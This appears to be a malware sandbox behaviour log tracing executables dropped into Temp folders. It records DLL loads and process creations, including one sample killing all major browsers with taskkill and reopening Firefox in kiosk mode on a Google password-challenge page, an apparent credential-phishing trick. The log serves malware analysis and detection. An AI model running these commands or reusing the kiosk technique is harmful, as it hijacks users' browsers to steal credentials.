Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe "C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe"
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe "C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70149f39-4644-4285-b4ad-18afc232e38d} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c164c71110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1632 -parentBuildID 20230927232528 -prefsHandle 1484 -prefMapHandle 3904 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33f69ba0-f69f-45b7-b28b-3edde4189f95} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c176eb0a10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2188 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e1a6159-709e-4015-91b7-c27852cbfe8d} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d594569d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4516 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4520 -prefsLen 32092 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {772a86bb-9c44-49fb-b5c4-a3def5e3b247} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d5a7886d10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Section loaded: wldp.dll
